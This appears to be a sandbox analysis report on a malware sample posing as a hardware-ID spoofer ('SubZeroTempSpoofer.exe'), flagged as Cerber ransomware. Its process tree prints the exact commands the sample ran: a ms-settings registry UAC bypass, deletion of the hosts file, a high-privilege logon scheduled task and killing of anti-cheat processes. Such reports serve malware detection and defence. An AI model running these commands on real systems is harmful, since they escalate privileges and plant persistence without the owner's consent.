cerber | 830911c62e119f783336370841718d96c5fffa236ec485b434b6de7dcaf6c46b

Analysis

max time kernel
89s
max time network
96s
platform
windows11-21h2_x64
resource
win11-20240214-en
resource tags

arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
submitted
18-02-2024 12:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SubZeroTempSpoofer.exe
Size

1.6MB
MD5

052449d155e679a80df0061fcc93e502
SHA1

b09e4fe7002c193cf42ba4da2499b77ae561c457
SHA256

830911c62e119f783336370841718d96c5fffa236ec485b434b6de7dcaf6c46b
SHA512

5472b8b4a98513c7aad5d98c1522439d3d48e054f6b4490bdee9698fcff48a3570d1bd1c7d4c2571c5584b9abf9e34db3060dd215895e856368f8fd26912e941
SSDEEP

24576:NWhpLZFBqScHobQ3EJEYFrk5FNQDdJVlDGUCbs+trje6B/F5b1ygR:N2pLZ3qScUQ3EJEYFrkufVlDGN4qVy

Score

10^/10

cerber persistence ransomware

Malware Config

Signatures

Cerber 8 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

Processes:

taskkill.exetaskkill.exeRuntime.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5024	taskkill.exe
4476	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}	Runtime.exe
5004	taskkill.exe
1908	taskkill.exe
3396	taskkill.exe
2412	taskkill.exe
1524	taskkill.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

RuntimeDebugger.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QIugiIyrlc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\QIugiIyrlc"	RuntimeDebugger.exe

Executes dropped EXE 5 IoCs

Processes:

RuntimeDebugger.exeSMBIOSRuntime.exeRuntime.exeAMIDEWIN64.exeqe0loory.exe

pid process

3528 RuntimeDebugger.exe
868 SMBIOSRuntime.exe
4340 Runtime.exe
4704 AMIDEWIN64.exe
4056 qe0loory.exe
Loads dropped DLL 1 IoCs

Processes:

AMIDEWIN64.exe

pid process

4704 AMIDEWIN64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

3 raw.githubusercontent.com
4 raw.githubusercontent.com
6 discord.com
1 raw.githubusercontent.com
1 discord.com

pid	process
3528	RuntimeDebugger.exe
868	SMBIOSRuntime.exe
4340	Runtime.exe
4704	AMIDEWIN64.exe
4056	qe0loory.exe

pid	process
4704	AMIDEWIN64.exe

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
6	discord.com
1	raw.githubusercontent.com
1	discord.com

Checks system information in the registry 2 TTPs 4 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SubZeroTempSpoofer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer = "1Z7O2EQHUY729JH"	SubZeroTempSpoofer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName = "1Z7O2E"	SubZeroTempSpoofer.exe

Drops file in Windows directory 1 IoCs

Processes:

SubZeroTempSpoofer.exe

description ioc process

File created C:\Windows\SMBIOSRuntime.exe SubZeroTempSpoofer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3620 schtasks.exe

description	ioc	process
File created	C:\Windows\SMBIOSRuntime.exe	SubZeroTempSpoofer.exe

pid	process
3620	schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeSubZeroTempSpoofer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SubZeroTempSpoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber	SubZeroTempSpoofer.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "XLWCEKWYXE"	SubZeroTempSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "DU1OBYJQ3D"	SubZeroTempSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1524 taskkill.exe
1124 taskkill.exe
5024 taskkill.exe
4476 taskkill.exe
5004 taskkill.exe
1908 taskkill.exe
3396 taskkill.exe
2412 taskkill.exe

pid	process
1524	taskkill.exe
1124	taskkill.exe
5024	taskkill.exe
4476	taskkill.exe
5004	taskkill.exe
1908	taskkill.exe
3396	taskkill.exe
2412	taskkill.exe

Modifies registry class 8 IoCs

Processes:

reg.exereg.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\halfhalf27041967.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-664403437-228026989-2547995067-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1868 PING.EXE

pid	process
1868	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

SubZeroTempSpoofer.exeAMIDEWIN64.exeqe0loory.exe

pid	process
1220	SubZeroTempSpoofer.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4056	qe0loory.exe
4056	qe0loory.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe
4704	AMIDEWIN64.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

RuntimeDebugger.exe

pid process

3528 RuntimeDebugger.exe
664
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

4664 msedge.exe
4664 msedge.exe
4664 msedge.exe
4664 msedge.exe
4664 msedge.exe
4664 msedge.exe
4664 msedge.exe
4664 msedge.exe

pid	process
3528	RuntimeDebugger.exe
664

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

SubZeroTempSpoofer.exeRuntimeDebugger.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeAMIDEWIN64.exeqe0loory.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1220	SubZeroTempSpoofer.exe
Token: SeLoadDriverPrivilege	3528	RuntimeDebugger.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	3396	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	4704	AMIDEWIN64.exe
Token: SeDebugPrivilege	4056	qe0loory.exe
Token: SeShutdownPrivilege	3316	Explorer.EXE
Token: SeCreatePagefilePrivilege	3316	Explorer.EXE
Token: SeShutdownPrivilege	3316	Explorer.EXE
Token: SeCreatePagefilePrivilege	3316	Explorer.EXE
Token: SeShutdownPrivilege	3316	Explorer.EXE
Token: SeCreatePagefilePrivilege	3316	Explorer.EXE
Token: SeShutdownPrivilege	3316	Explorer.EXE
Token: SeCreatePagefilePrivilege	3316	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe
4664	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SubZeroTempSpoofer.execmd.exeSMBIOSRuntime.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeAMIDEWIN64.exe

description	pid	process	target process
PID 1220 wrote to memory of 2512	1220	SubZeroTempSpoofer.exe	cmd.exe
PID 1220 wrote to memory of 2512	1220	SubZeroTempSpoofer.exe	cmd.exe
PID 1220 wrote to memory of 2512	1220	SubZeroTempSpoofer.exe	cmd.exe
PID 2512 wrote to memory of 3528	2512	cmd.exe	RuntimeDebugger.exe
PID 2512 wrote to memory of 3528	2512	cmd.exe	RuntimeDebugger.exe
PID 1220 wrote to memory of 868	1220	SubZeroTempSpoofer.exe	SMBIOSRuntime.exe
PID 1220 wrote to memory of 868	1220	SubZeroTempSpoofer.exe	SMBIOSRuntime.exe
PID 868 wrote to memory of 1948	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 1948	868	SMBIOSRuntime.exe	cmd.exe
PID 1948 wrote to memory of 5024	1948	cmd.exe	taskkill.exe
PID 1948 wrote to memory of 5024	1948	cmd.exe	taskkill.exe
PID 868 wrote to memory of 3060	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 3060	868	SMBIOSRuntime.exe	cmd.exe
PID 3060 wrote to memory of 4476	3060	cmd.exe	taskkill.exe
PID 3060 wrote to memory of 4476	3060	cmd.exe	taskkill.exe
PID 868 wrote to memory of 2404	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 2404	868	SMBIOSRuntime.exe	cmd.exe
PID 2404 wrote to memory of 5004	2404	cmd.exe	taskkill.exe
PID 2404 wrote to memory of 5004	2404	cmd.exe	taskkill.exe
PID 868 wrote to memory of 764	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 764	868	SMBIOSRuntime.exe	cmd.exe
PID 764 wrote to memory of 1908	764	cmd.exe	taskkill.exe
PID 764 wrote to memory of 1908	764	cmd.exe	taskkill.exe
PID 868 wrote to memory of 400	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 400	868	SMBIOSRuntime.exe	cmd.exe
PID 400 wrote to memory of 3396	400	cmd.exe	taskkill.exe
PID 400 wrote to memory of 3396	400	cmd.exe	taskkill.exe
PID 868 wrote to memory of 3024	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 3024	868	SMBIOSRuntime.exe	cmd.exe
PID 3024 wrote to memory of 2412	3024	cmd.exe	taskkill.exe
PID 3024 wrote to memory of 2412	3024	cmd.exe	taskkill.exe
PID 868 wrote to memory of 3456	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 3456	868	SMBIOSRuntime.exe	cmd.exe
PID 3456 wrote to memory of 1524	3456	cmd.exe	taskkill.exe
PID 3456 wrote to memory of 1524	3456	cmd.exe	taskkill.exe
PID 868 wrote to memory of 3888	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 3888	868	SMBIOSRuntime.exe	cmd.exe
PID 3888 wrote to memory of 4340	3888	cmd.exe	Runtime.exe
PID 3888 wrote to memory of 4340	3888	cmd.exe	Runtime.exe
PID 868 wrote to memory of 2852	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 2852	868	SMBIOSRuntime.exe	cmd.exe
PID 2852 wrote to memory of 4704	2852	cmd.exe	AMIDEWIN64.exe
PID 2852 wrote to memory of 4704	2852	cmd.exe	AMIDEWIN64.exe
PID 2852 wrote to memory of 4704	2852	cmd.exe	AMIDEWIN64.exe
PID 868 wrote to memory of 1660	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 1660	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 2784	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 2784	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 396	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 396	868	SMBIOSRuntime.exe	cmd.exe
PID 396 wrote to memory of 1124	396	cmd.exe	taskkill.exe
PID 396 wrote to memory of 1124	396	cmd.exe	taskkill.exe
PID 868 wrote to memory of 4388	868	SMBIOSRuntime.exe	cmd.exe
PID 868 wrote to memory of 4388	868	SMBIOSRuntime.exe	cmd.exe
PID 4388 wrote to memory of 1868	4388	cmd.exe	PING.EXE
PID 4388 wrote to memory of 1868	4388	cmd.exe	PING.EXE
PID 4704 wrote to memory of 2184	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 2184	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 2184	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 1920	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 1920	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 1920	4704	AMIDEWIN64.exe	reg.exe
PID 4704 wrote to memory of 3492	4704	AMIDEWIN64.exe	cmd.exe
PID 4704 wrote to memory of 3492	4704	AMIDEWIN64.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3316

C:\Users\Admin\AppData\Local\Temp\SubZeroTempSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\SubZeroTempSpoofer.exe"
2⤵
- Checks system information in the registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Temp\RuntimeDebugger C:\Windows\Temp\1Ez9KfpbmU.sys >nul
3⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\Temp\RuntimeDebugger.exe
C:\Windows\Temp\RuntimeDebugger C:\Windows\Temp\1Ez9KfpbmU.sys
4⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Windows\SMBIOSRuntime.exe
"C:\Windows\SMBIOSRuntime.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_BE.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\system32\taskkill.exe
taskkill /f /im OneDrive.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEservice.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\system32\taskkill.exe
taskkill /f /im BEservice.exe
5⤵
- Cerber
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Temp\Runtime.exe /ID /SP /SS /SU /SK /BM /BP /BV /BS /CS /CSK /PSN /PPN AUTO >NUL
4⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\Temp\Runtime.exe
C:\Windows\Temp\Runtime.exe /ID /SP /SS /SU /SK /BM /BP /BV /BS /CS /CSK /PSN /PPN AUTO
5⤵
- Cerber
- Executes dropped EXE
PID:4340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Windows\Temp\AMIDEWIN64.exe >nul
4⤵
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\Temp\AMIDEWIN64.exe
C:\Windows\Temp\AMIDEWIN64.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\halfhalf27041967.vbs" /f
6⤵
- Modifies registry class
PID:2184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
6⤵
- Modifies registry class
PID:1920

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
6⤵
PID:3492

C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
7⤵
PID:4152

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\halfhalf27041967.vbs
8⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
9⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN UpdateFirefoxComponents_FaI1OzZvT154JebGb18F040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\FaI1OzZvT154JebGb18F040MX.exe" /RL HIGHEST /IT
6⤵
PID:2944

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN UpdateFirefoxComponents_FaI1OzZvT154JebGb18F040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\FaI1OzZvT154JebGb18F040MX.exe" /RL HIGHEST /IT
7⤵
- Creates scheduled task(s)
PID:3620

C:\Users\Admin\AppData\Local\Temp\qe0loory.exe
"C:\Users\Admin\AppData\Local\Temp\qe0loory.exe" explorer.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Users\Admin\AppData\Local\Temp\chromedriver-win64\chromedriver.exe
"C:\Users\Admin\AppData\Local\Temp\chromedriver-win64\chromedriver.exe" --port=49843
6⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --log-level=0 --no-first-run --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --window-position=-32000,-32000 data:,
7⤵
PID:1480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Windows\SystemTemp\scoped_dir4340_2135751097 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\scoped_dir4340_2135751097\Crashpad --metrics-dir=C:\Windows\SystemTemp\scoped_dir4340_2135751097 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe42b79758,0x7ffe42b79768,0x7ffe42b79778
8⤵
PID:3576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --enable-logging --log-level=0 --mojo-platform-channel-handle=2060 --field-trial-handle=1952,i,4768923870604485463,12932673030954711085,131072 /prefetch:8
8⤵
PID:788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --enable-logging --log-level=0 --mojo-platform-channel-handle=1940 --field-trial-handle=1952,i,4768923870604485463,12932673030954711085,131072 /prefetch:8
8⤵
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --enable-logging --log-level=0 --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --enable-logging --log-level=0 --mojo-platform-channel-handle=1684 --field-trial-handle=1952,i,4768923870604485463,12932673030954711085,131072 /prefetch:2
8⤵
PID:2608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --display-capture-permissions-policy-allowed --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2924 --field-trial-handle=1952,i,4768923870604485463,12932673030954711085,131072 /prefetch:1
8⤵
PID:1620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Windows\SystemTemp\scoped_dir4340_2135751097" --display-capture-permissions-policy-allowed --first-renderer-process --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2328 --field-trial-handle=1952,i,4768923870604485463,12932673030954711085,131072 /prefetch:1
8⤵
PID:3648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\Runtime.exe >nul
4⤵
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\AMIFLDRV64.sys >nul
4⤵
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im WmiPrvSE.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\system32\taskkill.exe
taskkill /f /im WmiPrvSE.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Windows\SMBIOSRuntime.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:1868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/soarcheats
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
